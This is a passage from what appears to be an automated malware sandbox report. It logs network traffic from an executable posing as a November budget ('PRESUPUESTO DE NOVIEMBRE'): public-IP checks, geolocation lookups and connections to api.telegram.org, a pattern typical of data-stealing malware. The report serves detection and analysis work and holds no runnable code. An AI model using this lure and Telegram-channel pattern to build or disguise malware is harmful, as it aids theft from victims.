Oct 31, 2024 10:35:32.870671988 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:32.870716095 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:32.870798111 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:32.871063948 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:32.871078968 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:32.915966034 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:33.484709024 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:33.486357927 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:33.486406088 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:33.624177933 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:33.624308109 CET	443	49871	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:33.624391079 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:33.625116110 CET	49871	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:33.640129089 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:33.646862030 CET	80	49867	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:33.646939993 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:33.648881912 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:33.648936033 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:33.649032116 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:33.649418116 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:33.649434090 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.496447086 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.496573925 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:34.525892019 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:34.525930882 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.526192904 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.539478064 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:34.587327003 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.782130957 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.782201052 CET	443	49877	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:34.782273054 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:34.787276030 CET	49877	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:40.826353073 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:40.826391935 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:40.826494932 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:40.826715946 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:40.826728106 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:41.690464020 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:41.692264080 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:41.692284107 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:41.692369938 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:41.692378044 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:42.007913113 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:42.056467056 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:42.056479931 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:42.056843042 CET	49913	443	192.168.2.11	149.154.167.220
Oct 31, 2024 10:35:42.056931973 CET	443	49913	149.154.167.220	192.168.2.11
Oct 31, 2024 10:35:42.056987047 CET	49913	443	192.168.2.11	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:35:02.271914005 CET	50324	53	192.168.2.11	1.1.1.1
Oct 31, 2024 10:35:02.757272959 CET	53	50324	1.1.1.1	192.168.2.11
Oct 31, 2024 10:35:17.141781092 CET	63306	53	192.168.2.11	1.1.1.1
Oct 31, 2024 10:35:17.150319099 CET	53	63306	1.1.1.1	192.168.2.11
Oct 31, 2024 10:35:30.308347940 CET	57930	53	192.168.2.11	1.1.1.1
Oct 31, 2024 10:35:30.315867901 CET	53	57930	1.1.1.1	192.168.2.11
Oct 31, 2024 10:35:33.640820026 CET	58139	53	192.168.2.11	1.1.1.1
Oct 31, 2024 10:35:33.648272991 CET	53	58139	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 10:35:02.271914005 CET	192.168.2.11	1.1.1.1	0xb79c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:17.141781092 CET	192.168.2.11	1.1.1.1	0x85bf	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:30.308347940 CET	192.168.2.11	1.1.1.1	0xfacd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:33.640820026 CET	192.168.2.11	1.1.1.1	0x6f0c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:02.757272959 CET	1.1.1.1	192.168.2.11	0xb79c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:17.150319099 CET	1.1.1.1	192.168.2.11	0x85bf	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:17.150319099 CET	1.1.1.1	192.168.2.11	0x85bf	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:30.315867901 CET	1.1.1.1	192.168.2.11	0xfacd	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:30.315867901 CET	1.1.1.1	192.168.2.11	0xfacd	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:35:33.648272991 CET	1.1.1.1	192.168.2.11	0x6f0c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49708	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:02.771111965 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:12.773505926 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:35:12.778711081 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:35:13.087740898 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:35:13.697173119 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:35:13.828908920 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:35:13.828936100 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:35:13.829416990 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:35:17.018172026 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 58e96fcf4fbc1b7c345eb9fee32a8b4f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:35:18.046241999 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:35:18.300370932 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dbbeb45ad4a0f935c73b72926c919f25 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49786	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:19.070328951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:35:19.945801973 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c57c59497f38ff66f3de88da78002ff Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49798	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:20.715481997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:22.567306042 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfb7323370e377169645cb851e2acc5c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49815	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:23.336566925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:24.189604044 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b74019ff47732ef02bad8b7b8689feea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49823	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:24.951780081 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:25.833621025 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 279e19e17ca8258be0071c780ff03cf9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49834	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:26.596254110 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:29.487379074 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 45170f0ee9385ffa5eccd02e9b43fff0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49855	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:30.255770922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:31.142432928 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8bd9ca52cafc6ce01aa995de96eb0f05 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49867	132.226.247.73	80	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:35:32.003972054 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:35:32.869249105 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5158c928c45fb82e164856706165f99b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49774	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:17 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:18 UTC	1218	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4192 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wo6mA8OXkWQcS8YPcZ9Sn17t9RSsJXTuRnOc%2BJhMlnsZtbqT4lpglm%2FQfyXXPOgzXewst3E1JiUFtEQYSI4tC0P%2BMSaHgQ4tF6%2FfhFMnAD21oQoUkUcpdHge9dNjdvi2OPmfFjrn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7794a5c4654-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2452159&cwnd=242&unsent_bytes=0&cid=17f7320747019e24&ts=222&x=0"
2024-10-31 09:35:18 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-10-31 09:35:18 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49780	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:18 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:35:19 UTC	1218	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4193 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: 